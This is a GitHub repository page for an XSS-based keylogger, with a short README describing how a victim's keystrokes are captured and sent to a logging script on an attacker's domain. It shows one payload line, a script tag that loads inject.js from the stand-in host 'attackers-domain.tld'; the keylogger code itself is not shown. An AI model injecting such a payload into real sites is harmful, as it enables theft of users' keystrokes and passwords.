Skip to content

AamerShah/XSS-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

XSS-exploit

XSS Injection based keylogger

Injection Script Example: <script src=//attackers-domain.tld/inject.js></script>

Scenario: Here lets assume that Vulnerable.php is website that is vulnerable to XSS (self-XSS in this case). An attacker uses the above mentioned script to inject the inject.js file and log the keystrokes of the victim. The logger.php is also hosted on attackers domain to log the incomming key strokes as GET requests every second.

About

XSS Injection based keylogger

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published